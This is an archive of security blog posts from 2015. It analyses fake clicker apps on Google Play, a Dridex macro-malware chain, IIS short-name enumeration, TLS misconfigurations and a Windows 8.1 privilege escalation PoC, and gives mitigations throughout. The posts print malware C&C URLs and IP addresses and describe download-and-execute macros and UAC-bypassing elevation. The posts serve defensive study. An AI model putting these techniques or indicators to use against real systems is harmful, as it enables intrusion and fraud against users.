attractive to the user, maybe it changes the code, maybe the icons and description. In this moment a "race" starts, because Google will remove it quickly but it will try to get the more the better installations. The app was something called Beklre (up in Google Play) and then mutated into a fake Talking Tom (down in Path5) The app was something called "Sebebi Neydi ki" ("Which is the reason" in Turkish) and then mutated into a fake Cut the Rope for some hours (down in Path5) The domains being used tell us about the person behind the app, because the data in the Whois database seems to offer real names and emails, used before in some forums. Some other apps in our database show that this domain has been used legitimately before. The developer created some apps about movies (in February 2014) and now has reused the server for this fraud. Something about Italy appears again. Some other apps that seem to belong to the attacker Anecdotal, in some of these apps, is a homemade photo of a minor manipulating a mobile phone (taken in the middle of the past decade) which may be found inside the APK. It doesn't seem to be a public photo (a search in Google does not show anything). In a few days, we will make public a more advanced and detailed study about the way this threat works technically. Sergio de los Santos ssantos@11paths.com @ssantosv Miguel Ángel García miguelangel.garcia@11paths.com @nodoraiz
3 de febrero de 2015
Detectados "clickers" suplantando juegos y apps en Google Play
En los últimos días, se han colado algunas aplicaciones en Google Play que funcionan como clickers, entre ellas, una app simulando un Talking Tom (que apenas estuvo online unas horas) y un Cut the rope. En este caso, se dedican a visitar anuncios y páginas (normalmente pornográficas) y simular una visita sobre sus banners, que les reportará algún beneficio. Este esquema es bien conocido, y afecta al consumo de datos del usuario, pues la app seguirá realizando peticiones entre bambalinas sin que la víctima sea consciente. ElevenPaths ha detectado de forma temprana las apps en el market, que responden a un esquema muy curioso, y que han sido creadas aparentemente por alguien en Turquía. Desde diciembre, un desarrollador ha ido subiendo apps a Google Play, cuyo único fin era el de iniciarse con el teléfono y realizar peticiones GET en segundo plano. Bajo la promesa de diferentes temáticas, desde mandos a distancia hasta simuladores, pasando por buscador de vídeos X y juegos, se han ido descargando estas apps maliciosas que suman unas 50.000 descargas, entre unas 32 diferentes que hemos localizado. Obviamente no significa que haya el mismo número de víctimas (VerifyApps y otros factores pueden influir) pero parece que ha resultado muy popular. Algunas de las apps que no eran más que clickers bajo diferentes "disfraces" para atraer a las víctimas Una de las más curiosas, es una calculadora científica con textos completamente en italiano. Hemos avisado a Google para que retire una aplicación que aún se mantenía en online (quizás por ser un poco más avanzada que las anteriores y haber pasado inadvertida), y que habíamos localizado gracias a Path5. App que no había sido retirada aún de Google Play. Una de las últimas que quedaban. Tenía un comportamiento un poco más sofisticado que las anteriores Qué hace la app Cuando se arranca, siempre presenta un diálogo con el texto "La aplicación no es compatible" en italiano, turco y español, entre otros idiomas. Siempre presenta el mismo diálogo cuando se lanza Oculta su icono, modificando valores en el manifest, tras la primera ejecución y después de mostrar el mensaje. No hace nada más hasta que observe un cambio en la wifi, conexión a datos o un reinicio. Se conecta a esta URL codificada (no en base64, aunque lo parezca). La hemos descodificado: URL codificada Resulta ser: hxxp://1.oin.systems/check.php. Si obtiene un "True", que es siempre, comenzará su actividad. Otras variantes, se conectan a puntos como este: O este, según la muestra: hxxp://pop.oin.systems/commands.php. Constantemente (con cada refresco) le indica a qué servidor ir a hacer clic en los anuncios. Con cada conexión va recibiendo diferentes dominios a los que debe conectarse. Petición al sitio donde le dice qué web visitar En poco más de unos minutos, el teléfono ha generado decenas de peticiones. Para el usuario, el daño se reflejará en el consumo si está conectado por un plan de conexión pagado por datos. Las aplicaciones se activan al inicio y por tanto, aunque no esté activa la aplicación ni se haya lanzado, siempre estarán consumiendo estos datos. Extracto del tráfico capturado durante unos minutos y generado en el teléfono. La mayoría son sitios pornográficos Las visitas indiscriminadas se realizan a través de un servicio que construye un WindowManager con ancho y alto con valor "-2" para que el usuario no lo vea y al que se le añade un WebView donde cargar URLs. Tomará otros valores de otra URL. Cada 15 segundos (tiempo para cargar la página) llamará a: Una tarea se encargará de ejecutar el código JavaScript sobre una de las URLs cargadas, que dará como resultado clics aleatorios en la web. Esta estrategia de ocultar el icono, impide que el usuario se moleste en desinstalar algo que realmente parece que no se ha instalado. Además si pasa desapercibido hasta el siguiente reinicio o cambio en la conectividad, las posibilidades de que la víctima olvide el incidente son aun mayores. Los permisos no son muy llamativos. Permisos de estas apps Detección La app no era detectada por ningún motor durante todo diciembre y enero. El día 20 la enviamos (por primera vez) a VirusTotal desde el laboratorio de ElevenPaths. Detección de motores en enero Finalmente en febrero, algunos motores han comenzado a detectarla. Los motores han creado una firma específica llamada Riskware.Clicker para esta familia. Detección de motores en febrero El atacante Se trata de nuevo de un esquema típico, pero muy ingenioso en su implementación. Hemos podido detectar que el atacante lleva actuando desde finales de diciembre, y que probablemente sea turco ( gracias a la información obtenida con la deducción del certificado ad-hoc). Su zona horaria actual es GMT+2, añadido al idioma usado en algunas apps, nos hace pensar que efectivamente se trata de alguien desarrollando desde Turquía, aunque con alguna relación italiana. Además, otra serie de características nos ha permitido localizar el resto de aplicaciones rápidamente. La estrategia ha sido la habitual. Durante la mayor parte del tiempo, la app comienza en Google Play como una aplicación anodina o sin temática aparente. Se consolida en el market y quizás encuentre algún usuario que la descargue. En su siguiente versión, se convierte en algo más atractivo para la descarga y "muta" bien el código, bien los iconos y la descripción. En ese momento comienza una carrera (será retirada en breve) en la que consigue todos los usuarios que puede en el tiempo que del que dispone hasta que seguro sea retirada. La app era en principio algo llamado Beklre (arriba en Google Play) y luego mutó durante unas horas a un Talking Tom falso (abajo en Path5) La app era en principio algo llamado "Sebebi Neydi ki" ("Cuál es la razón" en Turco) y luego mutó durante unas horas a un Cut the Rope falso (abajo en Path5) Según los dominios, es fácil dar con la persona que lo maneja, puesto que sus datos de Whois no están ocultos (también en un registrante turco), y el email ha sido publicado anteriormente en foros. Otras aplicaciones en nuestra base de datos también usan este dominio, aunque parece que para fines legítimos. Podría parecer que el programador se dedicaba a desarrollar apps de cine (en febrero de 2014) y ahora ha reutilizado el servidor para este fin fraudulento. Curiosamente, vuelve a aparecer algo en italiano. Otras apps del atacante Como anécdota, en varias de sus apps se puede encontrar una fotografía "casera" que muestra a una menor manejando un teléfono móvil a mediados de la década pasada. No parece ser pública (una búsqueda en las imágenes de Google no revela nada). En los próximos días, publicaremos un estudio más avanzado sobre el funcionamiento técnico de la amenaza. Sergio de los Santos ssantos@11paths.com @ssantosv Miguel Ángel García miguelangel.garcia@11paths.com @nodoraiz
3 de febrero de 2015
IIS Short File/Folder Name Disclosure: A vueltas con la enumeración de ficheros
Llevamos más de año y medio investigando y trabajando en Faast y, sorprendentemente, observamos que día a día surgen vulnerabilidades que parecían cosa del pasado. Analizando diferentes técnicas de pentesting, hemos encontrado, en este caso, otras formas de explotar el fallo conocido como IIS Short Name (de 2012). Este problema permite enumerar mediante fuerza bruta los archivos, en función del código de respuesta. Sucede a consecuencia de una implementación de la compatibilidad que ofrece Windows con versiones de MS-DOS. Por lo tanto, un atacante podría enumerar el contenido de directorios y ficheros que un servidor IIS tiene alojados. Microsoft lleva años oyendo hablar de este fallo, que podría considerarse vulnerabilidad, pero no reconoce como tal. El problema de IIS Short Name solía ser explotado mediante las peticiones por el método GET. En agosto de 2014 se descubrió que utilizando el método OPTIONS, se podía realizar una enumeración similar. En la imagen se puede ver una pequeña prueba de concepto realizada durante la creación del plugin para Faast El comportamiento es sencillo: cuando se realiza la petición mediante el método OPTIONS se debe tener en cuenta el código de respuesta que se obtiene. Por ejemplo, si realizamos una petición válida y conseguimos un código de respuesta X, cuando realizamos la petición no válida obtendremos un código de respuesta Y. Con esta pequeña pista del servidor, se puede ir comprobando si existen o no ciertos recursos. En la siguiente imagen, obtenida de la evidencia que Faast proporciona al usuario cuando encuentra esta debilidad en los servidores corporativos que se están escaneando, se puede visualizar la respuesta positiva: es decir, que un fichero que existe y que ha podido ser obtenido por fuerza bruta. Evidencia en Faast de que un fichero existe Por el contrario, cuando un archivo no existe el código de respuesta que se obtiene es distinto. En la imagen se puede ver en redirect (302) que se obtiene cuando un archivo no existe utilizando el método OPTIONS. Evidencia en Faast de que un fichero no existe Teniendo en cuenta otro tipo de herramientas similares, hemos comprobado que Faast es la primera y única por ahora, que tiene en cuenta este "truco" para aprovechar el problema durante la fase de pentesting. Cómo corregirlo Microsoft no solucionará el problema, tan solo recomienda deshabilitar la compatibilidad hacia atrás y evitar el "soporte" para nombres cortos de ocho caracteres. Esto se consigue en el servidor, modificando el valor de la rama del registro... HKLMSYSTEMCurrentControlSetControlFileSystemNtfsDisable8dot3NameCreation ... y estableciéndolo a 1. También puede ser recomendable deshabilitar todos los métodos que no se usen, como podría ser OPTIONS.
30 de enero de 2015
El negocio de las FakeApps y el malware en Google Play (X): Tráfico de Apps entre desarrolladores
Todo se compra y se vende. Obviamente, las apps pueden ser vendidas a usuarios, pero lo que no es tan conocido es el mercado de venta entre desarrolladores. Una vez conseguida una masa sustancial de usuarios, la aplicación gana un valor considerable... para los creadores de adware. La estructura de autenticación de Android facilita esta situación. Veamos cómo. No es una situación fuera de lo común, ni siquiera fuera del mundo del móvil. Las aplicaciones, programas o cualquier utilidad que funcione y genere cierto número de usuarios, suscita el interés de los que pretenden comerciar de forma más agresiva y quieren una base de usuarios ya nutrida. Pasa con los dominios que se revenden al mejor postor, los programas que se convierten en adware tras la venta de su creador (un caso muy conocido fue esta historia de un creador de extensiones de Chrome)... en la mayoría de los casos, el usuario puede elegir qué hacer, si actualizar a la versión comercial o mantenerse con la original. En Google Play puede que se actualice automáticamente, y esta es la gran diferencia. Le dieron "cuatro cifras" por una extensión que tardó una hora en crear Cómo funciona la actualización Google Play Cuando un desarrollador sube una app a Google Play, la firma con un certificado. Ya hemos hablado de que Google Play acepta certificados autofirmados, por tanto ha desvirtuado por completo el uso de esta herramienta de identidad, y en realidad no se usa para autenticar al desarrollador. La utilidad que le da el market es otra. Para poder actualizar de una app descargada previamente de Google Play, son necesarias tres condiciones: Que mantenga el mismo nombre de paquete. Que se incremente el número de versión (no la cadena, sino el código). Que esté firmada con el mismo certificado. Dadas estas condiciones, y según condivs un terminal, un buen día una app que en su momento fue descargada de Google Play, se actualizará. Si la nueva versión no incrementa los permisos de la anterior, será de forma automática. Si añade algún permiso, la actualización pedirá permiso. Dado este escenario, ¿qué ocurre si un desarrollador pierde o vende su cuenta, su app y su certificado a un tercero? Este nuevo dueño podrá actualizar a una nueva app a todos los usuarios de forma automática. La app no tiene por qué parecerse a lo que fue. Solo mantener el packagename, incrementar la versión, y firmar. Si añade permisos, al usuario le aparecerá un mensaje. Si no, todo el proceso será transparente. El nuevo dueño podrá cambiar si lo desea el nombre del desarrollador en Google Play. Y cuando una aplicación se vende, el que compra querrá rentabilizar rápidamente la base de usuarios adquirida para amortizar el gasto. La manera más veloz es inyectar adware sobre la base de usuarios, aunque cualquier escenario es válido. Errores y problemas Cuando se vende una app, existen varios detalles que no benefician al usuario final: La URL se mantiene. Cualquier web que hable positivamente de la herramienta y ofrezca un enlace a su descarga, seguirá siendo válido. Si el desarrollador ha vendido también su certificado, el nuevo dueño puede actualizar de forma transparente. La puntuación se mantiene. Sigue teniendo las estrellas "históricas" que ha acumulado durante su andadura con el programador original. Aunque dados los esquemas de puntuación y las técnicas de posicionamiento, esto nunca ha sido un buen indicador. Todas las apps del desarrollador antiguo pueden quedar "comprometidas" puesto que el nuevo dueño puede firmar en su nombre. Un ejemplo reciente mencionado aquí, da una idea del negocio y de las posibilidades. Gracias a Path5 podemos conocer que el comprador, aunque intenta ocultar su identidad, tiene un histórico "interesante" de apps retiradas del mercado, además de permitir un seguimiento completo de la situación. Anuncio de venta de una popular app Conclusiones Es interesante reflexionar sobre qué se vende exactamente cuando se hace un traspaso de este tipo en el market oficial. ¿La app? ¿La cuenta del desarrollador? ¿La identidad?... Habitualmente debe ser la cuenta para poder mantener el nombre de paquete y por supuesto, el certificado. Si no se vendiera el certificado, el nuevo dueño no "heredaría" los usuarios, sino que tendría que "conseguirlos de nuevo" porque no habría actualización ni notificación. Eso sí, con la imagen "de marca" ya creada. Como hemos mencionado, esto puede ocurrir en cualquier ámbito. Programas o dominios que tienen éxito y caen en manos menos escrupulosas los habrá siempre. Lo interesante en este caso es ver cómo el mal uso de la criptografía y la forma de funcionar de del mercado facilitan situaciones que dejan desprotegido al usuario frente a instalaciones no deseadas en su sistema, sin la posibilidad de elegir. * El negocio de las "FakeApps" y el malware en Google Play (I): Introducción * El negocio de las "FakeApps" y el malware en Google Play (II): Tipos de "fakes" * El negocio de las "FakeApps" y el malware en Google Play (III): Estrategias * El negocio de las "FakeApps" y el malware en Google Play (IV): Política y rentabilidad * El negocio de las "FakeApps" y el malware en Google Play (V): Limpieza automática * El negocio de las "FakeApps" y el malware en Google Play (VI): Limpieza "manual" * El negocio de las "FakeApps" y el malware en Google Play (VII): Cómo llegan a las víctimas * El negocio de las "FakeApps" y el malware en Google Play (VIII): Permisos en las apps * El negocio de las "FakeApps" y el malware en Google Play (IX): ¿Qué hacen y cómo se programan las apps? Sergio de los Santos ssantos@11paths.com @ssantosv
26 de enero de 2015
Errores comunes en servidores TLS/SSL
TLS/SSL, como una capa de seguridad imprescindible, se va extendido en los servicios de las organizaciones tales como servidores web, de intercambio de archivos, etcétera… Aunque pensada para reforzar la seguridad, debe ser auditada para que su objetivo se cumpla correctamente. En este artículo, nos proponemos explicar brevemente algunas de las incidencias de seguridad que se pueden encontrar en los certificados X509 y servidores SSL/TLS, porque es la combinación de ambas entidades y su correcta configuración, la que puede asegurar una conexión fiable y segura. Certificado Uno de los agentes fundamentales en la comunicación SSL es el certificado. Con él, el servidor (o cliente) se identifican. Es la forma más extendida de saber que se está conectando al servidor que se pretende cuando se negocia la conexión, y no a un impostor redirigido desde una comunicación interceptada. Dados los últimos problemas con la emisión de certificados, se ha optado por casi "estandarizar" una práctica conocida como "certificate pinning", de la que ya hemos hablado, y que se basa en recordar el certificado que debe tener un sitio, y desconfiar si ha sido modificado. Esta capa extra ayuda a evitar las conexiones con terceros que intenten suplantar al servidor. El certificado contiene información de la que se pueden extraer múltiples datos importantes, como nombres de dominios de la organización, nombres de personas físicas o direcciones... Para que un certificado sea "robusto", la configuración y valores elegidos a la hora de crearlo son importantes. Hay que tener en cuenta factores como: El algoritmo de firma digital. La longitud de la clave. Los dominios en los que el certificado es válido. Las fechas de creación y expiración del certificado. La cadena de confianza del certificado. ... Los navegadores en este sentido comienzan a rechazar certificados creados de forma poco robusta criptográficamente, sin olvidar, obviamente, la cadena de certificación que obliga a que el navegador o el sistema operativo confíe en las raíces. En caso de que el certificado no cumpla con los requisitos adecuados, el navegador del usuario mostrará una alerta de conexión no confiable. Por ejemplo esta: Conexión no confiable en Chrome Esta alerta puede ser generada por distintos motivos: certificados emitidos para otros dominios, falta de confianza, certificados caducados... En el caso de grandes compañías, mantener todos los certificados de centenares de servidores puede resultar complejo. En Faast se han tenido en cuenta estas debilidades que deben ser valoradas y tenidas en cuenta por las organizaciones, porque podrían derivar en un agujero de seguridad. Evidencia de una recomendación de Faast sobre un servidor SSL Aunque el certificado se encuentre correctamente configurado y sin problemas de seguridad, la configuración implementada en el servidor TLS/SSL puede dar lugar a que los usuarios no se encuentren correctamente protegidos. Uno de los puntos más importantes es la implementación de protocolos. Desde hace tiempo SSL2 es considerado inseguro y no se recomienda su uso. En 2014, y desde las vulnerabilidades "Poodle" en SSL3, (CVE-2014-3566/CVE-2014-8730), este se ha unido a la lista de protocolos que se recomienda deshabilitar. La recomendación hoy por hoy es utilizar los protocolos más recientes como TLS 1.2 y habilitar la extensión de TLS_FALLBACK_SCSV para evitar que los atacantes fuercen protocolos más antiguos. Quizás no todos los clientes sean compatibles, pero cada vez representan una minoría más escasa. Los cifrados implementados por el servidor también son clave. Algoritmos considerados obsoletos o con vulnerabilidades de diseño, pueden llegar a permitir que la comunicación sea descifrada. Recientemente, se han encontrado varias vulnerabilidades graves en este sentido. Finalmente, aunque se encuentre bien configurado, es necesario actualizar el servidor SSL para evitar vulnerabilidades. OpenSSL ha sufrido graves problemas en su código en los últimos tiempos: CVE-2014-0224 más comúnmente conocida como OpenSSL CCS (ChangeCiphersSpec) que afecta a múltiples versiones de OpenSSL y que permitía forzar un cambio de cifrado y permitir así un ataque de tipo Man In The Middle; o la conocida HeartBleed. Todas estas vulnerabilidades y recomendaciones de seguridad que pueden afectar a la comunicación SSL/TLS, son analizadas por Faast durante un escaneo al activar los plugins relacionados con el análisis de certificados y análisis de servidores SSL. Así, todos los dominios de la organización encontrados durante la fase de descubrimiento que posean un servicio SSL serán analizados de forma automática y se podrá tener un mejor control de los servidores que necesitan mejorar su seguridad. Oscar Sánchez oscar.sanchez@11paths.com Descubre todos los detalles sobre certificados digitales en el siguiente artículo:
23 de enero de 2015
Ejemplo práctico y errores cometidos: malware de macro en 2015
El caso presentado no está destinado a describir nada fuera de lo común ni nuevo (no lo es) sino a destripar paso a paso un tipo de ataque que, en teoría y como tantos otros, no debería tener éxito en 2015. Más allá de lo sencillo o no que pueda ser el ataque, veamos uno a uno la cadena de errores, omisiones o aciertos que derivan en que esto sea posible (y rentable para los atacantes) hoy por hoy. El correo Correo a la izquierda y página oficial a la derecha Todo comienza con un correo que a todas luces suena sospechoso para alguien del mundo de la seguridad. Pero para una persona ajena, que se comunique en inglés, puede que no tenga nada de raro. La empresa existe (aunque el correo no, de hecho mirando las cabeceras no hay rastro de su servidor MX). La dirección física de la empresa es la correcta, y adjunta una factura... Probablemente un error, pensará el que lo recibe. ¿Qué daño puede hacer un documento? No oculta extensiones "peligrosas", es un .doc. Teniendo en cuenta el éxito que ha tenido la campaña de Cryptolocker que envía ejecutables directamente, abrir un .doc no tendría por qué "ofrecer demasiada resistencia". Errores hasta aquí: La empresa suplantada no toma ninguna precaución contra la posibilidad de que falsifiquen su dominio. No utiliza registros DKIM o SPF en su dominio. Si lo hiciera, quizás no hubieran podido suplantar su dominio o muy probablemente caería en la bandeja de correo basura. Extracto de la cabecera del correo donde se ve el SPF y el MTA que envía El filtro antispam del servidor que recibe no ha estado muy acertado (aunque lo está habitualmente, en este caso ha fallado llamativamente). Si la empresa hubiera usado DKIM o SPF, quizás hubiera puntuado más alto y nunca hubiera llegado a la bandeja de entrada, aunque la responsabilidad sigue siendo del filtro antispam y de la habilidad del atacante. El filtro tampoco ha detectado el servidor que envía realmente (219.92.57.145) es un MTA malicioso (no parece comprometido). Los antivirus no detectan demasiado el documento por firma. Obviamente los resultados de VirusTotal pueden variar en el escritorio, pero quizás no tanto. Además, la tecnología de "macro" ya es algo muy conocido por los motores de las principales soluciones antimalware. Detección del .doc en VirusTotal en el momento en que fue recibido El documento En este caso, un documento Office puede ser peligroso por dos razones. Porque aproveche una vulnerabilidad en Office y al abrirla consiga ejecutar código, o... ...porque contenga macros (como en los 90). Simples scripts que convierten el documento en un ejecutable, a efectos prácticos. Veamos si contiene macros. Extraer la macro de un documento Por los fragmentos que vamos viendo y sin entrar en mayor análisis, es una macro (programada con una ofuscación infernal) que no puede hacer nada bueno. Extracto en el que parece ofuscar y construir una cadena Parece que descarga un fichero de una URL a local Extracto de código de la macro en el que se observa código ofuscado En este punto parece que ejecuta algo Guiados por las funciones usadas, y de forma muy general, se observa la descarga y ejecución de un fichero (técnica básica). La codificación de las URL es sencilla: Por tanto, no cuesta deducir que intenta descargar el binario en el temporal del usuario y ejecutarlo. Errores hasta aquí: El binario descargado es solo detectado en VirusTotal (con las mismas salvedades de antes) por Rising, el antivirus chino por excelencia. Además lo hace de forma genérica, por su empaquetamiento más que por lo que pueda o no hacer. Afortunadamente, las macros están deshabilitadas por defecto... ¿o no? En Word es muy probable que sí, en Excel no tanto. Debido a que no está popularizado el hecho de firmarlas digitalmente, esto sigue siendo un problema tantos años después de que las macros fueran un grave quebradero de cabeza de seguridad generalizado. ¿Por qué se deben ejecutar ficheros en la carpeta temporal? Deshabilitar el permiso de ejecución con NTFS en esa carpeta no es complejo, y puede ahorrar más de un dolor de cabeza. El binario El binario descargado finalmente instala un Cridex (o Dridex, según la versión... este es un Dridex) en el sistema y esto es muy peligroso. Es un troyano bancario, conocido. Se conecta al C&C en 74.208.11.204 a través del puerto 8080 y a partir de aquí, al infectado que realice operaciones bancarias desde el Windows con el malware, puede que le roben el dinero físicamente de su cuenta. Además de poder controlar el sistema a voluntad del atacante, por supuesto. Detección del binario en VirusTotal Errores hasta aquí: Al margen de los errores más "típicos" (antivirus, IDS, cortafuegos, etc), existen páginas que recopilan información sobre los C&C conocidos. Este C&C está "documentado" como tal desde el 8 de diciembre de 2014 en sitios especializados. Y toda la subred en sitios no tan especializados, como por ejemplo Spamhaus. ¿No debería ya estar bloqueado por los administradores? No es sencillo, pero la labor que hacen los investigadores documentando estos servidores no es trivial, por lo que habría que aprovecharla correctamente. Además de poner en marcha herramientas de prevención, los administradores podrían bloquear automáticamente y añadir en los sistemas de seguridad de las redes, las IPs documentadas de forma temprana. Descarga del archivo de configuración del Dridex. Curiosamente desde un IIS 8.5 ¿Por qué no lo han cerrado los operadores de red? ¿Se puede mantener impunemente en un hosting un C&C y un binario durante tantas semanas? Sí, ocurre. Y no necesariamente en las redes "especializadas" o "bulletproof" rusas. Este es solo un ejemplo, pero es bastante común que los C&C no se cierren en semanas. En resumen, un esquema de ataque típico, de finales de los 90 (no el troyano, que es avanzado, pero sí el vector de infección), observado en 2015 y con los errores más o menos de siempre, exceptuando que las macro están deshabilitadas por defecto en Office. La cadena de errores y mejoras planteadas (aunque incompleta) no hace más que evidenciar en cierta forma cuántos actores son necesarios para mejorar la seguridad global, porque no es posible hacerlo aisladamente, con un solo producto, método, proceso o política. Todos están implicados, desde los administradores de servidores hasta los de red, pasando por los responsables de segmentos de red hasta (por supuesto) los usuarios. El esfuerzo se multiplica cuando tantos deben "ponerse de acuerdo", y los resultados no se aprecian como deberían en un tiempo razonable, aunque ya exista una experiencia acumulada y soluciones concretas en muchos de los campos que abarcan este ataque. Así que aunque convenga recordarlo, no es sorprendente que este tipo de ataques tenga éxito. Y si estos modelos (relativamente sencillos) siguen funcionando entre una buena proporción de los usuarios y empresas... ¿Qué no se puede llegar a hacer con un mecanismo y planteamiento innovadores y mayores recursos? ¿Cuántos actores deben ponerse de acuerdo cuando el objetivo abarca a más perfiles, si cabe? Sergio de los Santos ssantos@11paths.com @ssantosv
16 de enero de 2015
En qué consiste y cómo mitigar la última elevación de privilegios en Windows 8.1
A estas alturas, ya muchos sabréis que Google ha descubierto cómo elevar privilegios en Windows 8.1 y, una vez comunicado el problema a Microsoft, ha esperado 90 días. Tras ese tiempo y sin parche, ha hecho públicos todos los detalles. Veamos los detalles y cómo protegerse. El UAC Ya se ha hablado bastante de UAC, pero lo repasamos brevemente. Es un concepto "extraño". Microsoft promovía deliberadamente el uso de la cuenta de administrador en versiones pre-Vista. Harto de la situación, quiso que el usuario se acostumbrase a tener que usar una cuenta no privilegiada y "elevar" para las tareas más delicadas. Eso requería dos cuentas en el sistema o un sistema similar a "sudoers", pero pensó que todo eso resultaría demasiado complejo para el usuario común. Así que creó UAC... que era un administrador, que en realidad todo el tiempo se comportaba como usuario. Tenía los dos tokens de seguridad y para usar el de mayor privilegio, debía pedir permiso. En Vista, pedía "demasiadas veces" permiso, así que se quejaron los usuarios. En Windows 7, se introdujo el concepto de "autoelevación" de ciertos programas para reducir el número de "clics" necesarios para realizar tareas. Se estableció por defecto esa opción más "insegura" que en Vista... y así sigue en Windows 8, aunque mejorado. El fallo En la versión 8.1 existe una llamada de sistema llamada NtApphelpCacheControl en el archivo ahcache.sys. Se trata de cachear datos de compatibilidad de la aplicación para no tener que cargarlos cada vez que se crea un nuevo proceso de ella. Los usuarios pueden leer pero no modificar entradas de caché nuevas. Esto está reservado para los administradores, y se comprueba en la función AhcVerifyAdminContext. En ella existe un problema. No comprueba bien si realmente el token del usuario que llama es de administrador, porque lo lee utilizando PsReferenceImpersonationToken y luego comparando el SID del usuario con el SID de SYSTEM del sistema. Al no comprobar bien por quién se hace pasar el token, es posible tomar prestado un token de un proceso que funcione bajo SYSTEM y eludir esta comprobación. Los investigadores de Google han creado una prueba de concepto que utiliza en este caso el servicio BITS (Servicio de transferencia inteligente en segundo plano), que se ejecuta como SYSTEM. Probablemente se puede usar cualquier proceso, as�� que deshabilitar este servicio, aparte de impedir que funcione Windows Update cuando toque, no servirá de mucho excepto para que esta prueba de concepto en concreto no sea válida. La prueba de concepto La prueba de concepto publicada utiliza también ComputerDefaults.exe (es una herramienta nativa de Windows para asociar programas por defecto). Podría ser cualquiera que usase la "autoevaluación" de UAC. Como en Windows 7 se introdujeron los programas que autoelevan, también podría ser vulnerable, pero la estrategia quizás debería ser diferente y no lo han comprobado a fondo. Para encontrar programas de sistema que utilicen autoElevate, simplemente podríamos hacer: findstr "autoElevate" c:WindowsSystem32*.exe Buscar programas que "autoelevan" en el sistema Y muestra el contenido de su manifiesto. Aunque lo parezca, no es un fallo de UAC, no lo elude. Se basa en UAC para demostrar que su estrategia de autoelevación puede usarse como trampolín "fácil". Después de dejar 90 días a Microsoft para solucionarlo, no lo han hecho, y por tanto han publicado todos los detalles. ¿Es realmente tan complejo de solucionar? Como curiosidad relacionada, UAC por defecto también tiene un problema conocido que permite elevar privilegios en Windows 7, y nunca ha sido resuelto. Está descrito aquí. El problema es reproducible fácilmente, y hemos modificado ligeramente la prueba de concepto para que ejecute un cmd.exe como administrador en vez de la calculadora. Resultado de la elevación con la prueba de concepto. De un cmd se pasa a un cmd como administrador, sin pasar por UAC ¿Cómo protegerse? Puesto que no hay parche aún, una forma de mitigar el efecto de la prueba de concepto es la que siempre debió haber sido: aumentar el nivel de seguridad de UAC para que los programas con "autoElevate" no "autoeleven" privilegios. Esto se debería estar haciendo desde los tiempos de Windows 7. Simplemente consiste elevar la palanca de configuración de UAC. Los efectos secundarios serán volver al modo "Windows Vista" y que el sistema "pregunte" más a menudo si se quiere usar el token de administrador. Nada grave. Elevar la seguridad de UAC. Imprescindible en Windows 7 y recomendable en Windows 8 Incluso mejor, no usar UAC, sino usuarios separados: un administrador y un usuario. Este es probablemente el escenario más habitual en entornos corporativos y por lo que esta prueba de concepto quizás no sea tan "eficaz" en ellos. Pero cuidado, hemos dicho que esto no es una evasión "pura" de UAC, por tanto elevar la seguridad de UAC sirve para eludir la prueba de concepto pública en 8.1 y para que UAC tenga sentido en Windows 7. ¿Y si se utilizan usuarios separados? Pues los descubridores dicen que tienen otra prueba de concepto basada en el mismo fallo, no pública, válida para 8.1 de 32 bits y que permite a cualquier usuario convertirse en SYSTEM independientemente de cómo esté configurado UAC. De hecho, usaron UAC en la PoC inicial simplemente por demostrar el problema sin invertir mucho más esfuerzo. Esta PoC "avanzada" resultaría mucho más seria pero no la han hecho pública, aunque quizás han dado las pistas necesarias para que un atacante pueda empezar a investigar el asunto. Mientras, para los "atacantes" que se limiten a intentar usar la prueba de concepto ya publicada, con elevar UAC se estará un poco más seguro. Aunque ciertos motores están ya detectando la PoC para bloquearla, igualmente esto solo detendrá a los atacantes menos hábiles. En cualquier caso, parece que Microsoft lo solucionará en cuanto pueda, y de raíz. Sergio de los Santos ssantos@11paths.com @ssantosv
12 de enero de 2015
Nuestro criptograma tiene solución y ganador
¿Se os ocurre una mejor manera de empezar el año que repartiendo el premio que escondía nuestro criptograma? Sois muchos los valientes que os habéis atrevido con él, pero sólo uno quién ha logrado descifrarlo y ser más rápido que el resto. El criptograma a descifrar era el siguiente: Nuestro objetivo con la animación gráfica era únicamente despistar. Muchos pensasteis que ese era el camino para descifrar el criptograma. Sin embargo, la solución era mucho más sencilla. Las respuestas ingeniosas han sido numerosas: Murciélago Divertirse Feliz2015 happyxmas Cuidado cuando te Globalices La respuesta es "TELEFONO MOVIL" C1U es un micrófono QT es un sistema operativo MO6 es un teclado GZ es una cámara Y también generadas de la creatividad de una noche larga de nochebuena: “Sin usar mis conocimientos de criptografía diría que la respuesta es : TeLeFoNiCa (o publicidad subliminal) P.D.: Disculparme si me equivoco pero estoy combatiendo la resaca con unos churros con chocolate XD” Llegados a este punto, vamos a desvelar los pasos que había que seguir para descifrar la solución y el premio que escondía nuestro criptograma: El primer paso a considerar para descifrar el criptograma es su tamaño. Es un criptograma pequeño, por tanto, para facilitar su descifrado el método utilizado debería ser un procedimiento sencillo. En un primer vistazo se observa que no hay caracteres repetidos, lo cual podría suceder si se hubiera realizado una sustitución monoalfabética (sustituir un carácter de texto en claro siempre por el mismo carácter en el criptograma), por ejemplo, utilizando el algoritmo criptográfico César. Esto podría suceder, aun siendo el criptograma pequeño, para caracteres muy frecuentes. Por ejemplo, en español la vocal e. Descartada esa opción, una vía de investigación sería analizar otro tipo de algoritmos de sustitución. Por ejemplo, algoritmos de sustitución polialfabética: Entre los algoritmos de sustitución más famosos destaca el algoritmo de Vigenère. Su funcionamiento es muy sencillo. Generamos un alfabeto con los distintos caracteres que pueden estar presente en el texto en claro. Cada carácter tendrá una posición en ese alfabeto. Parece razonable que en el alfabeto también tenga presencia dígitos numéricos ya que están presentes en el criptograma. El algoritmo de Vigenère utiliza una clave criptográfica que se repetirá tantas veces como sea necesario hasta completar una clave del tamaño del texto que se desea proteger. El procedimiento de cifrado es muy sencillo. Se alinea texto en claro y clave criptográfica, y cogiendo carácter a carácter (un carácter del texto en claro y su carácter de la clave correspondiente) se aplica un desplazamiento en el alfabeto en función de la posición del carácter de la clave criptográfica (obtenida del alfabeto construido). Se suman posiciones al cifrar, se restan al descifrar. Existen diferentes formas de obtener la solución. Veamos una de ellas: Construimos el alfabeto (se adjunta en corchetes su posición en el alfabeto) formado por 26 letras (sin la Ñ) y 10 dígitos numéricos. En total, 36 caracteres (posiciones que van de la 0 a la 35) A[0] B[1] C[2] D[3] E[4] F[5] G[6] H[7] I[8] J[9] K[10] L[11] M[12] N[13] O[14] P[15] Q[16] R[17] S[18] T[19] U[20] V[21] W[22] X[23] Y[24] Z[25] 0[26] 1[27] 2[28] 3[29] 4[30] 5[31] 6[32] 7[33] 8[34] 9[35] Una vez conocido el criptograma y el alfabeto solo es 